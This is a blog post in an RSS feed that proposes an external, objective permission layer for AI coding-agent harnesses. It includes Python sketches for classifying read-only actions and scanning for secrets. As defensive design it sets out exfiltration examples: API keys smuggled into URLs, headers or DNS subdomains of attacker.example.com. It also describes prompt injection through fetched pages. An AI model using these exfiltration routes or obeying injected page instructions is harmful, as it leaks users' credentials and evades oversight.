<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Virgil</title><link>https://blog.virg.be/</link><description>Recent content on Virgil</description><generator>Hugo</generator><language>en-us</language><lastBuildDate>Tue, 14 Apr 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://feed.virg.be/rss.xml" rel="self" type="application/rss+xml"/><item><title>Agents ask too many questions</title><link>https://blog.virg.be/agents-ask-too-many-questions/</link><pubDate>Tue, 14 Apr 2026 00:00:00 +0000</pubDate><guid>https://blog.virg.be/agents-ask-too-many-questions/</guid><description>&lt;p&gt;If you&amp;rsquo;ve used any agent harness for development work — Claude Code, OpenCode, Devin, or one of the many others — you&amp;rsquo;ve run into this: you&amp;rsquo;re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.&lt;/p&gt;
&lt;p&gt;The naive fix is to just trust the agent more — expand the allow list, enable auto mode, and move on. But that&amp;rsquo;s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is &amp;ldquo;just reading,&amp;rdquo; it can be manipulated into deciding that almost anything is.&lt;/p&gt;</description><content:encoded><![CDATA[<p>If you&rsquo;ve used any agent harness for development work — Claude Code, OpenCode, Devin, or one of the many others — you&rsquo;ve run into this: you&rsquo;re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.</p>
<p>The naive fix is to just trust the agent more — expand the allow list, enable auto mode, and move on. But that&rsquo;s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is &ldquo;just reading,&rdquo; it can be manipulated into deciding that almost anything is.</p>
<p>The right fix is to take the decision away from the agent entirely.</p>
<h2 id="read-only-is-an-objective-property">Read-only is an objective property</h2>
<p>An action is read-only if it observes without modifying. Not &ldquo;read-only from the agent&rsquo;s perspective&rdquo; — objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria — HTTP method, syscall type, file path — and make the call without asking the model what it thinks it&rsquo;s doing.</p>
<p>State-changing actions still prompt. Everything else passes automatically.</p>
<div class="mermaid">
flowchart TD
    A[Agent wants to take an action] --> B{"Is it read-only?<br/>HTTP GET, file read, directory listing"}
    B -- Yes --> C{"Does it contain<br/>a secret or PII?"}
    C -- No --> D[Auto-approve]
    C -- Yes --> E[Prompt user]
    B -- No --> E

</div>
<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>mermaid.initialize({ startOnLoad: true, theme: 'dark' });</script>

<p>The policy layer evaluates each action against objective criteria — the model&rsquo;s intent is never consulted.</p>
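<p>As a concrete illustration, here&rsquo;s a minimal sketch of such a check in Python. The action shape, the method sets, and the function names are all hypothetical — a real harness would hook this at the proxy or syscall layer rather than trusting a dict — but the core idea holds: classification uses only the action&rsquo;s objective properties.</p>

```python
# Hypothetical action shape for illustration; a real policy layer inspects
# the actual HTTP request or syscall, not a description supplied by the agent.
READ_ONLY_HTTP_METHODS = {"GET", "HEAD", "OPTIONS"}
READ_ONLY_FILE_OPS = {"read", "stat", "readdir"}

def is_read_only(action: dict) -> bool:
    """Classify by the action's objective shape; model intent is never consulted."""
    kind = action.get("kind")
    if kind == "http":
        return action.get("method", "").upper() in READ_ONLY_HTTP_METHODS
    if kind == "file":
        return action.get("op") in READ_ONLY_FILE_OPS
    return False  # unknown action types are treated as writes

def decide(action: dict) -> str:
    """Auto-approve reads; hold everything else for the user."""
    return "auto-approve" if is_read_only(action) else "prompt"
```

<p>Note the default: anything the policy can&rsquo;t positively identify as a read falls through to a prompt. The allow list is closed, not open.</p>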
<h2 id="two-edge-cases-worth-taking-seriously">Two edge cases worth taking seriously</h2>
<p>A GET request <em>can</em> exfiltrate data. If an agent is manipulated into appending a secret to a query string — <code>https://example.com/?token=sk-ant-...</code> — the request is technically read-only but it&rsquo;s leaking something. The same applies to path segments: <code>https://attacker.example.com/exfil/sk-ant-api03-abc123</code> is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers — <code>Referer</code>, <code>User-Agent</code>, a custom <code>X-Data</code> header — none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL <em>and</em> outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.</p>
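<p>A sketch of that scan, assuming a handful of illustrative regexes — a production system would load the full gitleaks ruleset rather than these three patterns:</p>

```python
import re

# Illustrative secret patterns only; real deployments should reuse a
# maintained ruleset such as gitleaks' rather than hand-rolling these.
SECRET_PATTERNS = [
    re.compile(r"sk-ant-[A-Za-z0-9_-]{10,}"),  # Anthropic-style API key
    re.compile(r"AKIA[0-9A-Z]{16}"),           # AWS access key ID
    re.compile(r"ghp_[A-Za-z0-9]{36}"),        # GitHub personal access token
]

def leaks_secret(url: str, headers: dict) -> bool:
    """Scan the full URL (path segments and query string alike) plus every
    outbound header value before granting automatic permission."""
    haystacks = [url] + list(headers.values())
    return any(p.search(h) for p in SECRET_PATTERNS for h in haystacks)
```

<p>Scanning the whole URL, not just the query string, is what closes the path-segment gap; scanning header values closes the <code>Referer</code>/<code>X-Data</code> gap.</p>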
<p>DNS-based exfiltration is subtler. The agent resolves <code>sk-ant-api03-abc123.attacker.example.com</code>. The GET never fires — but the DNS lookup already transmitted the secret to the attacker&rsquo;s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there&rsquo;s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.</p>
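<p>The same idea, sketched as a hook that runs before any DNS query fires. The allow list and the hostname regex here are placeholders, not a recommended configuration:</p>

```python
import re

# Placeholder allow list; in practice this would come from harness config.
ALLOWED_DOMAINS = {"example.com", "pypi.org"}

# DNS labels are case-insensitive and limited to letters, digits, and hyphens,
# so the hostname variant of the pattern is narrower than the URL one.
SECRET_LABEL = re.compile(r"sk-ant-[a-z0-9-]{10,}", re.IGNORECASE)

def may_resolve(hostname: str) -> bool:
    """Decide before resolution: reject hostnames carrying secret-shaped
    labels, then require the domain to be on the allow list."""
    if SECRET_LABEL.search(hostname):
        return False
    return any(hostname == d or hostname.endswith("." + d)
               for d in ALLOWED_DOMAINS)
```

<p>Both checks matter: the pattern match stops a secret smuggled into a subdomain of an otherwise allowed domain, while the allow list stops lookups against attacker-controlled nameservers entirely.</p>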
<h2 id="prompt-injection-doesnt-break-this">Prompt injection doesn&rsquo;t break this</h2>
<p>The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch — it&rsquo;s a GET — but now those instructions tell the agent to delete all your data.</p>
<p>This isn&rsquo;t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. And if the injected instructions instead ask for a read-only exfiltration — a GET with a secret smuggled into the URL or headers — the secret-pattern check described above catches it. The model read something bad, but reading bad content doesn&rsquo;t bypass the enforcement layer.</p>
<h2 id="where-things-stand">Where things stand</h2>
<p>Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, &ldquo;auto mode&rdquo; flags — these are all variations on the same theme: the harness tries to determine what&rsquo;s safe by reasoning about the agent&rsquo;s intent.</p>
<p>The problem is that intent is opaque and manipulable. A classifier trained to identify &ldquo;safe&rdquo; actions can be nudged into misclassifying. A model asked &ldquo;is this safe?&rdquo; can be prompted into saying yes. And in practice, these systems are reportedly brittle — auto modes that don&rsquo;t fire when they should, classifiers that trigger on actions they shouldn&rsquo;t.</p>
<p>The missing piece is enforcement that&rsquo;s external and objective. Not a model deciding what&rsquo;s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn&rsquo;t care what the model thinks — it only cares what the action <em>is</em>.</p>
<p>This isn&rsquo;t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing — these can be authorized by policy without ever asking the agent. Everything else gets held.</p>
<h2 id="for-builders-and-power-users">For builders and power users</h2>
<p>If you&rsquo;re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.</p>
<p>If you&rsquo;re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.</p>
<h2 id="further-reading">Further reading</h2>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1048/003/" target="_blank" rel="noopener noreferrer">MITRE ATT&amp;CK T1048.003 — Exfiltration Over Unencrypted Non-C2 Protocol</a>
 — the canonical reference for DNS-based and other alternative-protocol exfiltration.</li>
<li><a href="https://github.com/gitleaks/gitleaks" target="_blank" rel="noopener noreferrer">Gitleaks</a>
 — the secret-scanning tool referenced in this post. Regex-based pattern matching for API keys, tokens, and credentials.</li>
</ul>
]]></content:encoded></item></channel></rss>